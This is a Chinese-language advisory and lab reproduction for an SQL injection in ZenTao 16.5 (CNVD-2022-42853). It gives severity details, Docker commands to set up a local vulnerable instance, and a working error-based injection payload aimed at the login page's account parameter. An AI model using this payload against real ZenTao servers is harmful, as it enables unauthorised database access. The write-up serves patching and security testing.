CNVD-2022-42853: 禅道16.5 SQL注入
漏洞描述
禅道16.5的版本未对输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行。
| CNVD-ID | CNVD-2022-42853 |
| 公开日期 | 2022-06-14 |
| 危害级别 | 高 |
| 漏洞评分 | 7.8 |
| 影响产品 | 青岛易软天创网络科技有限公司 禅道企业版 6.5 |
| 青岛易软天创网络科技有限公司 | 禅道旗舰版 3.0 |
| 青岛易软天创网络科技有限公司 | 禅道开源版 16.5 |
| 青岛易软天创网络科技有限公司 | 禅道开源版 16.5.beta1 |
| 漏洞类型 | 通用型漏洞 |
| 漏洞解决方案 | 厂商已提供漏洞修补方案,请关注厂商主页及时更新: |
| 厂商补丁 | 禅道存在SQL注入漏洞的补丁 |
| 验证信息 | 已验证 |
| 报送时间 | 2022-04-30 |
| 收录时间 | 2022-06-02 |
| 更新时间 | 2022-06-02 |
环境搭建
这里为了减少工作量,使用docker搭建
#1.下载镜像
docker pull easysoft/zentao:16.5
#2.启动容器
docker run --name myzentao -p 8090:80 -v /home/scm/zentao/chandao:/www/zentaopms -v /home/scm/zentao/chandao/mysql:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=abcd1234 -d 38b5e1a66ae8
3.访问web页面安装(该填的填好就OK)
漏洞复现
payload:
url: /zentao/user-login.html
POST: account=admin'+and+(select+extractvalue(1,concat(0x7e,(MD5(110)),0x7e)))#
